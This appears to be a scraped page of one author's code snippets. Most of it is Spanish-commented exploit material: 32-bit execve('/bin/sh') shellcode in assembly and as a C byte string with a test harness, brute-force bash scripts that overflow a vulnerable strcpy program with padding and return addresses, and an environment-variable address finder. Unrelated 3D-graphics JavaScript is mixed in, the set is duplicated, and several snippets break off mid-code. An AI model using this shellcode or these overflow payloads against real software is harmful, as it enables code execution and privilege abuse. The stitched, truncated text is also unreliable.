Ángel Luis RdlP

## shellcode.s
.code32
.section .text
.globl _start

_start:
  jmp truco
inicio:
  pop %esi
  xorl %eax, %eax
  movb %al, 0x07(%esi)

## shellcode_intel.asm
section .text
global _start

_start:
  jmp truco
inicio:
  pop ESI
  xor EAX, EAX
  mov [ESI + 7], AL
  mov AL, 0Bh

## test_shellcode.c
char shellcode[] = "\xeb\x14\x5e\x31\xc0\x88\x46\x07\xb0\x0b\x89\xf3\x31\xc9\x31\xd2\xcd\x80\xb0\x01\xcd\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" ;

void main(){
  void (*fp) (void);
  fp = (void *)&shellcode;
  fp();
}

## exploit.sh
#!/bin/bash

max=255
for i in `seq 214 $max`
do
  for j in `seq 0 $max`
  do
    hex=`printf "%02x" $i`
    hex1=`printf "%02x" $j`
    echo "probando direccion: 0xffff$hex$hex1"

## getenv.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  if (argc < 3){
    printf("uso: %s variable_entorno programa_vulnerable\n", argv[0]);
    return 0;
  }

## exploit.sh
#!/bin/sh

for i in `seq 1 200`;
do
  echo "Número de intentos: $i"
  ./name `python -c "print 'A'*44 + '\xbc\x6c\xb5\xff'"`
done

## name.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(char *arg)
{
  char name[32];
  strcpy(name, arg);
  printf("Bienvenido %s\n", name);
}

## xploit.sh
#!/bin/sh

for i in `seq 1 2000`;
do
  echo "Número de intentos: $i"
  ./name `python -c "print 'A'*44 + '\x70\x83\x04\x08' + '\x90\x83\x04\x08' + '\x3e\x73\xf3\xff' "`
done

## mapping.js
earthMaterial = new AL3D.BlinnMaterial({shininess : 128, diffuse : 0xFFAAAAAA, specular : 0xffffffff, shading : AL3D.PhongInterpolation,  texture: './res/color-map.jpg', specularMap: './res/specular-map.jpg', normalMap: './res/normal-map1.jpg'});

earth = new AL3D.Mesh.createSphere({radius: 1, height : 2, material : earthMaterial});
earth.position = new ALMath.Vector3(0,0,-2);

## postprocessing.js
renderer = new AL3D.Renderer(window.innerWidth,window.innerHeight);
camera = new AL3D.PerspectiveCamera(40, window.innerWidth/window.innerHeight);
scene = new AL3D.Scene();
scene.add(mesh);
scene.add(light);
renderer.addEffect(new AL3D.GreyScaleEffect());
renderer.render(scene, camera);
	.code32
	.section .text
	.globl _start

	_start:
	jmp truco
	inicio:
	pop %esi
	xorl %eax, %eax
	movb %al, 0x07(%esi)
	section .text
	global _start

	_start:
	jmp truco
	inicio:
	pop ESI
	xor EAX, EAX
	mov [ESI + 7], AL
	mov AL, 0Bh
	char shellcode[] = "\xeb\x14\x5e\x31\xc0\x88\x46\x07\xb0\x0b\x89\xf3\x31\xc9\x31\xd2\xcd\x80\xb0\x01\xcd\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" ;

	void main(){
	void (*fp) (void);
	fp = (void *)&shellcode;
	fp();
	}
	#!/bin/bash

	max=255
	for i in `seq 214 $max`
	do
	for j in `seq 0 $max`
	do
	hex=`printf "%02x" $i`
	hex1=`printf "%02x" $j`
	echo "probando direccion: 0xffff$hex$hex1"
	#include <stdlib.h>
	#include <stdio.h>
	#include <string.h>

	int main(int argc, char **argv)
	{
	if (argc < 3){
	printf("uso: %s variable_entorno programa_vulnerable\n", argv[0]);
	return 0;
	}
	#!/bin/sh

	for i in `seq 1 200`;
	do
	echo "Número de intentos: $i"
	./name `python -c "print 'A'*44 + '\xbc\x6c\xb5\xff'"`
	done
	#!/bin/sh

	for i in `seq 1 2000`;
	do
	echo "Número de intentos: $i"
	./name `python -c "print 'A'*44 + '\x70\x83\x04\x08' + '\x90\x83\x04\x08' + '\x3e\x73\xf3\xff' "`
	done
	earthMaterial = new AL3D.BlinnMaterial({shininess : 128, diffuse : 0xFFAAAAAA, specular : 0xffffffff, shading : AL3D.PhongInterpolation, texture: './res/color-map.jpg', specularMap: './res/specular-map.jpg', normalMap: './res/normal-map1.jpg'});

	earth = new AL3D.Mesh.createSphere({radius: 1, height : 2, material : earthMaterial});
	earth.position = new ALMath.Vector3(0,0,-2);
	renderer = new AL3D.Renderer(window.innerWidth,window.innerHeight);
	camera = new AL3D.PerspectiveCamera(40, window.innerWidth/window.innerHeight);
	scene = new AL3D.Scene();
	scene.add(mesh);
	scene.add(light);
	renderer.addEffect(new AL3D.GreyScaleEffect());
	renderer.render(scene, camera);